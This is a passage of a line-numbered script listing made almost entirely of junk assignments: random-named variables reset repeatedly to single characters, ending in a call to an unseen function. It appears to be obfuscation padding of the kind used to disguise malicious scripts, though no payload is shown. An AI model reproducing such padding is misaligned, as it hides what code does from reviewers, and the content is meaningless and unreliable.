774 | gilyecokb = "D"; | |
775 | gilyecokb = "A"; | |
776 | gilyecokb = "o"; | |
777 | gilyecokb = "Q"; | |
778 | gilyecokb = "V"; | |
779 | gilyecokb = "W"; | |
780 | gilyecokb = "L"; | |
781 | gilyecokb = "M"; | |
782 | gilyecokb = "P"; | |
783 | gilyecokb = "E"; | |
784 | wnuyo = "x"; | |
785 | wnuyo = "D"; | |
786 | wnuyo = "P"; | |
787 | wnuyo = "c"; | |
788 | wnuyo = "C"; | |
789 | wnuyo = "R"; | |
790 | wnuyo = "c"; | |
791 | wnuyo = "G"; | |
792 | wnuyo = "z"; | |
793 | wnuyo = "K"; | |
794 | wnuyo = "s"; | |
795 | wnuyo = "g"; | |
796 | wnuyo = "m"; | |
797 | wnuyo = "U"; | |
798 | wnuyo = "E"; | |
799 | wnuyo = "A"; | |
800 | wnuyo = "m"; | |
801 | wnuyo = "N"; | |
802 | wnuyo = "i"; | |
803 | zpcyd = "r"; | |
804 | zpcyd = "A"; | |
805 | zpcyd = "J"; | |
806 | zpcyd = "&"; | |
807 | szfmsdwe = "s"; | |
808 | szfmsdwe = "H"; | |
809 | szfmsdwe = "J"; | |
810 | szfmsdwe = "H"; | |
811 | szfmsdwe = "m"; | |
812 | szfmsdwe = "D"; | |
813 | szfmsdwe = "F"; | |
814 | szfmsdwe = "D"; | |
815 | szfmsdwe = "L"; | |
816 | szfmsdwe = "E"; | |
817 | szfmsdwe = "F"; | |
818 | szfmsdwe = "L"; | |
819 | szfmsdwe = "T"; | |
820 | szfmsdwe = "E"; | |
821 | szfmsdwe = "j"; | |
822 | szfmsdwe = "Y"; | |
823 | szfmsdwe = "W"; | |
824 | szfmsdwe = "v"; | |
825 | kkgxi = "a"; | |
826 | kkgxi = "K"; | |
827 | kkgxi = "O"; | |
828 | enqjy = "p"; | |
829 | enqjy = "r"; | |
830 | enqjy = "P"; | |
831 | enqjy = "L"; | |
832 | enqjy = "n"; | |
833 | enqjy = "P"; | |
834 | enqjy = "l"; | |
835 | enqjy = "s"; | |
836 | enqjy = "G"; | |
837 | enqjy = "u"; | |
838 | enqjy = "C"; | |
839 | enqjy = "I"; | |
840 | enqjy = "H"; | |
841 | enqjy = "k"; | |
842 | enqjy = "Q"; | |
843 | enqjy = "q"; | |
844 | enqjy = "Q"; | |
845 | enqjy = "V"; | |
846 | enqjy = "z"; | |
847 | enqjy = "V"; | |
848 | enqjy = "r"; | |
849 | cvovm = "H"; | |
850 | cvovm = "U"; | |
851 | cvovm = "V"; | |
852 | cvovm = "x"; | |
853 | cvovm = "p"; | |
854 | cvovm = "9"; | |
855 | qfmhy = "T"; | |
856 | qfmhy = "j"; | |
857 | qfmhy = "c"; | |
858 | qfmhy = "f"; | |
859 | qfmhy = "z"; | |
860 | qfmhy = "h"; | |
861 | qfmhy = "K"; | |
862 | qfmhy = "r"; | |
863 | qfmhy = "i"; | |
864 | qfmhy = "Y"; | |
865 | qfmhy = "D"; | |
866 | qfmhy = "n"; | |
867 | qfmhy = "L"; | |
868 | qfmhy = "w"; | |
869 | qfmhy = "Y"; | |
870 | qfmhy = "X"; | |
871 | qfmhy = "q"; | |
872 | qfmhy = "D"; | |
873 | qfmhy = "I"; | |
874 | qfmhy = "r"; | |
875 | qfmhy = "w"; | |
876 | qfmhy = "s"; | |
877 | qfmhy = "O"; | |
878 | qfmhy = "m"; | |
879 | qfmhy = "I"; | |
880 | qfmhy = "T"; | |
881 | qfmhy = "p"; | |
882 | eszbytaq = "F"; | |
883 | eszbytaq = "c"; | |
884 | eszbytaq = "G"; | |
885 | eszbytaq = "N"; | |
886 | eszbytaq = "O"; | |
887 | eszbytaq = "Y"; | |
888 | eszbytaq = "v"; | |
889 | eszbytaq = "K"; | |
890 | eszbytaq = "G"; | |
891 | eszbytaq = "U"; | |
892 | eszbytaq = "D"; | |
893 | eszbytaq = "C"; | |
894 | eszbytaq = "d"; | |
895 | eszbytaq = "f"; | |
896 | eszbytaq = "J"; | |
897 | eszbytaq = "e"; | |
898 | eszbytaq = "Y"; | |
899 | eszbytaq = "U"; | |
900 | eszbytaq = "q"; | |
901 | eszbytaq = "D"; | |
902 | eszbytaq = "L"; | |
903 | eszbytaq = "L"; | |
904 | eszbytaq = "G"; | |
905 | eszbytaq = "m"; | |
906 | vspyszlp = "N"; | |
907 | vspyszlp = "m"; | |
908 | vspyszlp = "M"; | |
909 | vspyszlp = "T"; | |
910 | vspyszlp = "p"; | |
911 | vspyszlp = "p"; | |
912 | vspyszlp = "X"; | |
913 | vspyszlp = "B"; | |
914 | vspyszlp = "X"; | |
915 | vspyszlp = "y"; | |
916 | vspyszlp = "g"; | |
917 | vspyszlp = "b"; | |
918 | vspyszlp = "J"; | |
919 | vspyszlp = "d"; | |
920 | vspyszlp = "K"; | |
921 | vspyszlp = "/"; | |
922 | ykkcqzqap = "b"; | |
923 | ykkcqzqap = "N"; | |
924 | ykkcqzqap = "O"; | |
925 | ykkcqzqap = "h"; | |
926 | ykkcqzqap = "U"; | |
927 | ykkcqzqap = "X"; | |
928 | ykkcqzqap = "D"; | |
929 | ykkcqzqap = "V"; | |
930 | ykkcqzqap = "s"; | |
931 | ykkcqzqap = "h"; | |
932 | ykkcqzqap = "M"; | |
933 | ykkcqzqap = "c"; | |
934 | ykkcqzqap = "y"; | |
935 | ykkcqzqap = "Z"; | |
936 | ykkcqzqap = "g"; | |
937 | ykkcqzqap = "R"; | |
938 | ykkcqzqap = "x"; | |
939 | ykkcqzqap = "d"; | |
940 | ykkcqzqap = "Z"; | |
941 | ykkcqzqap = "B"; | |
942 | ykkcqzqap = "b"; | |
943 | ykkcqzqap = "v"; | |
944 | ykkcqzqap = "q"; | |
945 | ykkcqzqap = "A"; | |
946 | ykkcqzqap = "g"; | |
947 | ykkcqzqap = "v"; | |
948 | ykkcqzqap = "e"; | |
949 | ykkcqzqap = "u"; | |
950 | ykkcqzqap = "Z"; | |
951 | ykkcqzqap = "e"; | |
952 | ykkcqzqap = "Y"; | |
953 | ykkcqzqap = "H"; | |
954 | ykkcqzqap = "H"; | |
955 | ykkcqzqap = "x"; | |
956 | ykkcqzqap = "Q"; | |
957 | ykkcqzqap = "X"; | |
958 | ykkcqzqap = "B"; | |
959 | ykkcqzqap = "R"; | |
960 | ykkcqzqap = "k"; | |
961 | ykkcqzqap = "Y"; | |
962 | ngqvntzq = "X"; | |
963 | ngqvntzq = "u"; | |
964 | ngqvntzq = "I"; | |
965 | ngqvntzq = "J"; | |
966 | ngqvntzq = "j"; | |
967 | ngqvntzq = "a"; | |
968 | ngqvntzq = "q"; | |
969 | ngqvntzq = "O"; | |
970 | ngqvntzq = "e"; | |
971 | ngqvntzq = "U"; | |
972 | ngqvntzq = "b"; | |
973 | ngqvntzq = "U"; | |
974 | ngqvntzq = "F"; | |
975 | ngqvntzq = "s"; | |
976 | ngqvntzq = "W"; | |
977 | ngqvntzq = "s"; | |
978 | ngqvntzq = "F"; | |
979 | ngqvntzq = "w"; | |
980 | ngqvntzq = "g"; | |
981 | ngqvntzq = "r"; | |
982 | ngqvntzq = "E"; | |
983 | ngqvntzq = "q"; | |
984 | ngqvntzq = "k"; | |
985 | ngqvntzq = "o"; | |
986 | ngqvntzq = "K"; | |
987 | ngqvntzq = "s"; | |
988 | ngqvntzq = "X"; | |
989 | ngqvntzq = "i"; | |
990 | ngqvntzq = "W"; | |
991 | ngqvntzq = "O"; | |
992 | ngqvntzq = "N"; | |
993 | ngqvntzq = "z"; | |
994 | ngqvntzq = "K"; | |
995 | ngqvntzq = "F"; | |
996 | ngqvntzq = "r"; | |
997 | ngqvntzq = "U"; | |
998 | ngqvntzq = "U"; | |
999 | ngqvntzq = "w"; | |
1000 | ngqvntzq = "p"; | |
1001 | ngqvntzq = "l"; | |
1002 | ngqvntzq = "M"; | |
1003 | ngqvntzq = "s"; | |
1004 | ngqvntzq = "_"; | |
1005 | zddjrw = "g"; | |
1006 | zddjrw = "B"; | |
1007 | zddjrw = "T"; | |
1008 | zddjrw = "h"; | |
1009 | zddjrw = "V"; | |
1010 | zddjrw = "U"; | |
1011 | zddjrw = "X"; | |
1012 | zddjrw = "D"; | |
1013 | zddjrw = "A"; | |
1014 | zddjrw = "x"; | |
1015 | zddjrw = "L"; | |
1016 | zddjrw = "R"; | |
1017 | igubg = "y"; | |
1018 | igubg = "N"; | |
1019 | igubg = "t"; | |
1020 | igubg = "t"; | |
1021 | igubg = "H"; | |
1022 | igubg = "l"; | |
1023 | igubg = "p"; | |
1024 | igubg = "m"; | |
1025 | igubg = "n"; | |
1026 | igubg = "I"; | |
1027 | igubg = "m"; | |
1028 | igubg = "S"; | |
1029 | igubg = "q"; | |
1030 | igubg = "E"; | |
1031 | igubg = "D"; | |
1032 | igubg = "c"; | |
1033 | igubg = "G"; | |
1034 | igubg = "J"; | |
1035 | igubg = "h"; | |
1036 | igubg = "O"; | |
1037 | igubg = "X"; | |
1038 | igubg = "b"; | |
1039 | igubg = "q"; | |
1040 | igubg = "N"; | |
1041 | igubg = "F"; | |
1042 | igubg = "l"; | |
1043 | igubg = "o"; | |
1044 | igubg = "U"; | |
1045 | igubg = "e"; | |
1046 | igubg = "x"; | |
1047 | igubg = "B"; | |
1048 | igubg = "A"; | |
1049 | igubg = "T"; | |
1050 | igubg = "w"; | |
1051 | igubg = "s"; | |
1052 | igubg = "x"; | |
1053 | igubg = "Z"; | |
1054 | igubg = "n"; | |
1055 | igubg = "E"; | |
1056 | igubg = "T"; | |
1057 | igubg = "T"; | |
1058 | umkmos = "S"; | |
1059 | umkmos = "L"; | |
1060 | umkmos = "J"; | |
1061 | umkmos = "k"; | |
1062 | umkmos = "g"; | |
1063 | umkmos = "b"; | |
1064 | umkmos = "S"; | |
1065 | umkmos = "g"; | |
1066 | umkmos = "k"; | |
1067 | umkmos = "M"; | |
1068 | umkmos = "u"; | |
1069 | wbeid = "V"; | |
1070 | wbeid = "h"; | |
1071 | wbeid = "W"; | |
1072 | wbeid = "W"; | |
1073 | wbeid = "d"; | |
1074 | wbeid = "C"; | |
1075 | wbeid = "k"; | |
1076 | wbeid = "J"; | |
1077 | wbeid = "q"; | |
1078 | wbeid = "b"; | |
1079 | wbeid = "g"; | |
1080 | wbeid = "i"; | |
1081 | wbeid = "N"; | |
1082 | wbeid = "X"; | |
1083 | wbeid = "w"; | |
1084 | wbeid = "O"; | |
1085 | wbeid = "R"; | |
1086 | wbeid = "Q"; | |
1087 | wbeid = "z"; | |
1088 | wbeid = "z"; | |
1089 | wbeid = "r"; | |
1090 | wbeid = "d"; | |
1091 | wbeid = "w"; | |
1092 | wbeid = "X"; | |
1093 | wbeid = "J"; | |
1094 | wbeid = "F"; | |
1095 | wbeid = "s"; | |
1096 | wbeid = "P"; | |
1097 | wbeid = "w"; | |
1098 | wbeid = "l"; | |
1099 | hagojti = "j"; | |
1100 | hagojti = "Z"; | |
1101 | hagojti = "O"; | |
1102 | hagojti = "Q"; | |
1103 | hagojti = "A"; | |
1104 | hagojti = "x"; | |
1105 | hagojti = "s"; | |
1106 | hagojti = "u"; | |
1107 | hagojti = "m"; | |
1108 | hagojti = "R"; | |
1109 | hagojti = "Q"; | |
1110 | pvgizguy = "M"; | |
1111 | pvgizguy = "i"; | |
1112 | pvgizguy = "f"; | |
1113 | pvgizguy = "t"; | |
1114 | pvgizguy = "c"; | |
1115 | pvgizguy = "J"; | |
1116 | pvgizguy = "S"; | |
1117 | pvgizguy = "K"; | |
1118 | pvgizguy = "l"; | |
1119 | pvgizguy = "N"; | |
1120 | pvgizguy = "t"; | |
1121 | pvgizguy = "h"; | |
1122 | pvgizguy = "H"; | |
1123 | pvgizguy = "T"; | |
1124 | pvgizguy = "l"; | |
1125 | pvgizguy = "h"; | |
1126 | pvgizguy = "O"; | |
1127 | pvgizguy = "C"; | |
1128 | pvgizguy = "e"; | |
1129 | pvgizguy = "r"; | |
1130 | pvgizguy = "a"; | |
1131 | pvgizguy = "o"; | |
1132 | pvgizguy = "O"; | |
1133 | pvgizguy = "t"; | |
1134 | pvgizguy = "G"; | |
1135 | pvgizguy = "A"; | |
1136 | pvgizguy = "G"; | |
1137 | pvgizguy = "P"; | |
1138 | pvgizguy = "d"; | |
1139 | pvgizguy = "y"; | |
1140 | pvgizguy = "M"; | |
1141 | pvgizguy = "U"; | |
1142 | pvgizguy = "o"; | |
1143 | pvgizguy = "c"; | |
1144 | pvgizguy = "S"; | |
1145 | phajxe = "H"; | |
1146 | phajxe = "h"; | |
1147 | phajxe = "o"; | |
1148 | phajxe = "Q"; | |
1149 | phajxe = "U"; | |
1150 | phajxe = "Y"; | |
1151 | phajxe = "f"; | |
1152 | phajxe = "X"; | |
1153 | phajxe = "m"; | |
1154 | phajxe = "B"; | |
1155 | phajxe = "E"; | |
1156 | phajxe = "Y"; | |
1157 | phajxe = "b"; | |
1158 | phajxe = "y"; | |
1159 | phajxe = "u"; | |
1160 | phajxe = "f"; | |
1161 | phajxe = "E"; | |
1162 | phajxe = "x"; | |
1163 | phajxe = "M"; | |
1164 | phajxe = "k"; | |
1165 | phajxe = "C"; | |
1166 | phajxe = "p"; | |
1167 | phajxe = "l"; | |
1168 | phajxe = "M"; | |
1169 | phajxe = "r"; | |
1170 | phajxe = "X"; | |
1171 | phajxe = "n"; | |
1172 | phajxe = "R"; | |
1173 | phajxe = "q"; | |
1174 | phajxe = "O"; | |
1175 | phajxe = "Z"; | |
1176 | phajxe = "k"; | |
1177 | phajxe = "r"; | |
1178 | phajxe = "V"; | |
1179 | phajxe = "f"; | |
1180 | phajxe = "k"; | |
1181 | phajxe = "B"; | |
1182 | phajxe = "l"; | |
1183 | phajxe = "g"; | |
1184 | phajxe = "D"; | |
1185 | phajxe = "N"; | |
1186 | phajxe = "U"; | |
1187 | phajxe = "O"; | |
1188 | phajxe = "p"; | |
1189 | phajxe = "o"; | |
1190 | hdnklxjf = "r"; | |
1191 | hdnklxjf = "F"; | |
1192 | hdnklxjf = "X"; | |
1193 | hdnklxjf = "Z"; | |
1194 | hdnklxjf = "l"; | |
1195 | hdnklxjf = "e"; | |
1196 | hdnklxjf = "U"; | |
1197 | hdnklxjf = "B"; | |
1198 | hdnklxjf = "j"; | |
1199 | hdnklxjf = "t"; | |
1200 | hdnklxjf = "j"; | |
1201 | hdnklxjf = "o"; | |
1202 | hdnklxjf = "W"; | |
1203 | hdnklxjf = "c"; | |
1204 | hdnklxjf = "a"; | |
1205 | hdnklxjf = "d"; | |
1206 | hdnklxjf = "y"; | |
1207 | hdnklxjf = "o"; | |
1208 | hdnklxjf = "s"; | |
1209 | hdnklxjf = "E"; | |
1210 | hdnklxjf = "p"; | |
1211 | hdnklxjf = "G"; | |
1212 | hdnklxjf = "Z"; | |
1213 | hdnklxjf = "r"; | |
1214 | hdnklxjf = "M"; | |
1215 | hdnklxjf = "Q"; | |
1216 | hdnklxjf = "r"; | |
1217 | hdnklxjf = "m"; | |
1218 | hdnklxjf = "d"; | |
1219 | gfsxtytu = "p"; | |
1220 | gfsxtytu = "h"; | |
1221 | gfsxtytu = "T"; | |
1222 | gfsxtytu = "V"; | |
1223 | gfsxtytu = "M"; | |
1224 | gfsxtytu = "m"; | |
1225 | gfsxtytu = "z"; | |
1226 | gfsxtytu = "C"; | |
1227 | gfsxtytu = "E"; | |
1228 | gfsxtytu = "n"; | |
1229 | gfsxtytu = "d"; | |
1230 | gfsxtytu = "G"; | |
1231 | gfsxtytu = "h"; | |
1232 | gfsxtytu = "m"; | |
1233 | gfsxtytu = "N"; | |
1234 | gfsxtytu = "O"; | |
1235 | gfsxtytu = "M"; | |
1236 | gfsxtytu = "C"; | |
1237 | gfsxtytu = "w"; | |
1238 | gfsxtytu = "T"; | |
1239 | gfsxtytu = "k"; | |
1240 | gfsxtytu = "e"; | |
1241 | gfsxtytu = "O"; | |
1242 | gfsxtytu = "X"; | |
1243 | gfsxtytu = "b"; | |
1244 | gfsxtytu = "L"; | |
1245 | gfsxtytu = "l"; | |
1246 | gfsxtytu = "J"; | |
1247 | gfsxtytu = "C"; | |
1248 | gfsxtytu = "o"; | |
1249 | gfsxtytu = "w"; | |
1250 | gfsxtytu = "s"; | |
1251 | gfsxtytu = "0"; | |
1252 | mermc = "d"; | |
1253 | mermc = "D"; | |
1254 | mermc = "t"; | |
1255 | mermc = "N"; | |
1256 | mermc = "b"; | |
1257 | mermc = "R"; | |
1258 | mermc = "e"; | |
1259 | mermc = "O"; | |
1260 | mermc = "f"; | |
1261 | mermc = "R"; | |
1262 | mermc = "l"; | |
1263 | mermc = "v"; | |
1264 | mermc = "I"; | |
1265 | mermc = "d"; | |
1266 | mermc = "l"; | |
1267 | mermc = "s"; | |
1268 | mermc = "d"; | |
1269 | mermc = "f"; | |
1270 | mermc = "D"; | |
1271 | mermc = "5"; | |
1272 | ouoad = "J"; | |
1273 | ouoad = "j"; | |
1274 | ouoad = "I"; | |
1275 | ouoad = "n"; | |
1276 | ouoad = "q"; | |
1277 | ouoad = "T"; | |
1278 | ouoad = "y"; | |
1279 | ouoad = "i"; | |
1280 | ouoad = "h"; | |
1281 | ouoad = "b"; | |
1282 | ouoad = "b"; | |
1283 | ouoad = "l"; | |
1284 | ouoad = "S"; | |
1285 | ouoad = "T"; | |
1286 | ouoad = "O"; | |
1287 | ouoad = "C"; | |
1288 | ouoad = "n"; | |
1289 | ouoad = "u"; | |
1290 | ouoad = "d"; | |
1291 | ouoad = "O"; | |
1292 | ouoad = "j"; | |
1293 | ouoad = "f"; | |
1294 | xjtgjhjm = "R"; | |
1295 | xjtgjhjm = "j"; | |
1296 | xjtgjhjm = "W"; | |
1297 | xjtgjhjm = "k"; | |
1298 | xjtgjhjm = "p"; | |
1299 | xjtgjhjm = "p"; | |
1300 | xjtgjhjm = "w"; | |
1301 | xjtgjhjm = "h"; | |
1302 | xjtgjhjm = "g"; | |
1303 | xjtgjhjm = "q"; | |
1304 | xjtgjhjm = "b"; | |
1305 | xjtgjhjm = "B"; | |
1306 | xjtgjhjm = "c"; | |
1307 | xjtgjhjm = "C"; | |
1308 | xjtgjhjm = "x"; | |
1309 | xjtgjhjm = "P"; | |
1310 | xjtgjhjm = "x"; | |
1311 | xjtgjhjm = "C"; | |
1312 | xjtgjhjm = "g"; | |
1313 | xjtgjhjm = "F"; | |
1314 | xjtgjhjm = "h"; | |
1315 | xjtgjhjm = "v"; | |
1316 | xjtgjhjm = "k"; | |
1317 | xjtgjhjm = "r"; | |
1318 | xjtgjhjm = "e"; | |
1319 | mgdmnk = "w"; | |
1320 | mgdmnk = "J"; | |
1321 | mgdmnk = "D"; | |
1322 | mgdmnk = "T"; | |
1323 | mgdmnk = "Z"; | |
1324 | mgdmnk = "w"; | |
1325 | mgdmnk = "y"; | |
1326 | mgdmnk = "J"; | |
1327 | mgdmnk = "S"; | |
1328 | mgdmnk = "L"; | |
1329 | mgdmnk = "l"; | |
1330 | mgdmnk = "t"; | |
1331 | mgdmnk = "n"; | |
1332 | mgdmnk = "S"; | |
1333 | mgdmnk = "G"; | |
1334 | mgdmnk = "K"; | |
1335 | mgdmnk = "U"; | |
1336 | mgdmnk = "B"; | |
1337 | mgdmnk = "k"; | |
1338 | mgdmnk = "p"; | |
1339 | mgdmnk = "-"; | |
1340 | axkoxpkww = "f"; | |
1341 | axkoxpkww = "p"; | |
1342 | axkoxpkww = "W"; | |
1343 | axkoxpkww = "T"; | |
1344 | axkoxpkww = "J"; | |
1345 | axkoxpkww = "T"; | |
1346 | axkoxpkww = "k"; | |
1347 | axkoxpkww = "x"; | |
1348 | axkoxpkww = "C"; | |
1349 | axkoxpkww = "x"; | |
1350 | axkoxpkww = "t"; | |
1351 | axkoxpkww = "d"; | |
1352 | axkoxpkww = "p"; | |
1353 | axkoxpkww = "F"; | |
1354 | axkoxpkww = "e"; | |
1355 | axkoxpkww = "s"; | |
1356 | axkoxpkww = "a"; | |
1357 | axkoxpkww = "U"; | |
1358 | axkoxpkww = "j"; | |
1359 | axkoxpkww = "D"; | |
1360 | axkoxpkww = "Q"; | |
1361 | axkoxpkww = "w"; | |
1362 | axkoxpkww = "G"; | |
1363 | axkoxpkww = "Z"; | |
1364 | axkoxpkww = "I"; | |
1365 | axkoxpkww = "w"; | |
1366 | axkoxpkww = "L"; | |
1367 | axkoxpkww = "r"; | |
1368 | axkoxpkww = "c"; | |
1369 | axkoxpkww = "u"; | |
1370 | axkoxpkww = "Y"; | |
1371 | axkoxpkww = "h"; | |
1372 | axkoxpkww = "f"; | |
1373 | axkoxpkww = "r"; | |
1374 | axkoxpkww = "t"; | |
1375 | axkoxpkww = "m"; | |
1376 | axkoxpkww = "D"; | |
1377 | axkoxpkww = "v"; | |
1378 | axkoxpkww = "A"; | |
1379 | axkoxpkww = "j"; | |
1380 | iecxm = "h"; | |
1381 | iecxm = "z"; | |
1382 | iecxm = "f"; | |
1383 | iecxm = "g"; | |
1384 | iecxm = "Q"; | |
1385 | iecxm = "t"; | |
1386 | iecxm = "O"; | |
1387 | iecxm = "q"; | |
1388 | iecxm = "m"; | |
1389 | iecxm = "J"; | |
1390 | iecxm = "M"; | |
1391 | iecxm = "m"; | |
1392 | iecxm = "M"; | |
1393 | iecxm = "i"; | |
1394 | iecxm = "\\"; | |
1395 | ultfap = "K"; | |
1396 | ultfap = "W"; | |
1397 | ultfap = "p"; | |
1398 | ultfap = "N"; | |
1399 | ultfap = "m"; | |
1400 | ultfap = "d"; | |
1401 | ultfap = "h"; | |
1402 | ultfap = "j"; | |
1403 | ultfap = "o"; | |
1404 | ultfap = "L"; | |
1405 | ultfap = "b"; | |
1406 | ultfap = "v"; | |
1407 | ultfap = "u"; | |
1408 | ultfap = "u"; | |
1409 | ultfap = "G"; | |
1410 | ultfap = "B"; | |
1411 | ultfap = "K"; | |
1412 | ultfap = "P"; | |
1413 | ultfap = "f"; | |
1414 | ultfap = "E"; | |
1415 | ultfap = "j"; | |
1416 | ultfap = "m"; | |
1417 | ultfap = "q"; | |
1418 | ultfap = "x"; | |
1419 | ultfap = "O"; | |
1420 | ultfap = "V"; | |
1421 | ultfap = "O"; | |
1422 | ultfap = "J"; | |
1423 | ultfap = "t"; | |
1424 | ultfap = "o"; | |
1425 | ultfap = "c"; | |
1426 | ultfap = "8"; | |
1427 | awcze = "K"; | |
1428 | awcze = "u"; | |
1429 | awcze = "Z"; | |
1430 | awcze = "L"; | |
1431 | awcze = "L"; | |
1432 | awcze = "H"; | |
1433 | awcze = "M"; | |
1434 | awcze = "D"; | |
1435 | awcze = "c"; | |
1436 | awcze = "G"; | |
1437 | awcze = "J"; | |
1438 | awcze = "o"; | |
1439 | awcze = "u"; | |
1440 | awcze = "C"; | |
1441 | awcze = "x"; | |
1442 | awcze = "P"; | |
1443 | awcze = "o"; | |
1444 | awcze = "c"; | |
1445 | awcze = "C"; | |
1446 | awcze = "F"; | |
1447 | awcze = "M"; | |
1448 | awcze = "e"; | |
1449 | awcze = "I"; | |
1450 | awcze = "x"; | |
1451 | awcze = "K"; | |
1452 | awcze = "K"; | |
1453 | awcze = "C"; | |
1454 | awcze = "t"; | |
1455 | awcze = "P"; | |
1456 | awcze = "W"; | |
1457 | awcze = "w"; | |
1458 | awcze = "N"; | |
1459 | awcze = "g"; | |
1460 | awcze = "d"; | |
1461 | awcze = "X"; | |
1462 | awcze = "p"; | |
1463 | awcze = "w"; | |
1464 | awcze = "j"; | |
1465 | awcze = "k"; | |
1466 | awcze = "u"; | |
1467 | awcze = "i"; | |
1468 | awcze = "m"; | |
1469 | awcze = "k"; | |
1470 | awcze = "K"; | |
1471 | idpcooh = "K"; | |
1472 | idpcooh = "s"; | |
1473 | idpcooh = "b"; | |
1474 | idpcooh = "a"; | |
1475 | idpcooh = "v"; | |
1476 | idpcooh = "o"; | |
1477 | idpcooh = "r"; | |
1478 | idpcooh = "P"; | |
1479 | idpcooh = "o"; | |
1480 | idpcooh = "j"; | |
1481 | idpcooh = "J"; | |
1482 | idpcooh = "R"; | |
1483 | idpcooh = "A"; | |
1484 | idpcooh = "H"; | |
1485 | idpcooh = "a"; | |
1486 | idpcooh = "g"; | |
1487 | idpcooh = "I"; | |
1488 | idpcooh = "N"; | |
1489 | idpcooh = "u"; | |
1490 | idpcooh = "H"; | |
1491 | idpcooh = "Y"; | |
1492 | idpcooh = "X"; | |
1493 | idpcooh = "N"; | |
1494 | idpcooh = "m"; | |
1495 | idpcooh = "H"; | |
1496 | idpcooh = "n"; | |
1497 | idpcooh = "P"; | |
1498 | idpcooh = "B"; | |
1499 | idpcooh = "r"; | |
1500 | idpcooh = "S"; | |
1501 | idpcooh = "E"; | |
1502 | idpcooh = "B"; | |
1503 | idpcooh = "j"; | |
1504 | idpcooh = "Q"; | |
1505 | idpcooh = "x"; | |
1506 | idpcooh = "L"; | |
1507 | idpcooh = "v"; | |
1508 | idpcooh = "Y"; | |
1509 | idpcooh = "7"; | |
1510 | gmgfh = "M"; | |
1511 | gmgfh = "Q"; | |
1512 | gmgfh = "F"; | |
1513 | gmgfh = "k"; | |
1514 | gmgfh = "Y"; | |
1515 | gmgfh = "d"; | |
1516 | gmgfh = "p"; | |
1517 | gmgfh = "L"; | |
1518 | jqfgk = "s"; | |
1519 | jqfgk = "s"; | |
1520 | jqfgk = "l"; | |
1521 | jqfgk = "o"; | |
1522 | jqfgk = "G"; | |
1523 | jqfgk = "K"; | |
1524 | jqfgk = "x"; | |
1525 | jqfgk = "S"; | |
1526 | jqfgk = "J"; | |
1527 | jqfgk = "m"; | |
1528 | jqfgk = "V"; | |
1529 | jqfgk = "z"; | |
1530 | jqfgk = "C"; | |
1531 | jqfgk = "g"; | |
1532 | jqfgk = "i"; | |
1533 | jqfgk = "F"; | |
1534 | jqfgk = "Z"; | |
1535 | jqfgk = "W"; | |
1536 | jqfgk = "S"; | |
1537 | jqfgk = "V"; | |
1538 | jqfgk = "J"; | |
1539 | jqfgk = "B"; | |
1540 | jqfgk = "D"; | |
1541 | jqfgk = "B"; | |
1542 | jqfgk = "u"; | |
1543 | jqfgk = "n"; | |
1544 | jqfgk = "y"; | |
1545 | jqfgk = "v"; | |
1546 | jqfgk = "Z"; | |
1547 | jqfgk = "B"; | |
1548 | jqfgk = "l"; | |
1549 | jqfgk = "V"; | |
1550 | jqfgk = "Y"; | |
1551 | jqfgk = "w"; | |
1552 | jqfgk = "g"; | |
1553 | jqfgk = "d"; | |
1554 | jqfgk = "@"; | |
1555 | pncpkosff = "o"; | |
1556 | pncpkosff = "e"; | |
1557 | pncpkosff = "X"; | |
1558 | pncpkosff = "j"; | |
1559 | pncpkosff = "P"; | |
1560 | pncpkosff = "c"; | |
1561 | pncpkosff = "E"; | |
1562 | pncpkosff = "r"; | |
1563 | pncpkosff = "q"; | |
1564 | pncpkosff = "n"; | |
1565 | pncpkosff = "s"; | |
1566 | pncpkosff = "i"; | |
1567 | pncpkosff = "U"; | |
1568 | pncpkosff = "B"; | |
1569 | pncpkosff = "S"; | |
1570 | pncpkosff = "z"; | |
1571 | pncpkosff = "U"; | |
1572 | pncpkosff = "p"; | |
1573 | pncpkosff = "Q"; | |
1574 | pncpkosff = "U"; | |
1575 | pncpkosff = "t"; | |
1576 | pncpkosff = "N"; | |
1577 | pncpkosff = "p"; | |
1578 | pncpkosff = "g"; | |
1579 | pncpkosff = "4"; | |
1580 | xgzuk ( ); |
|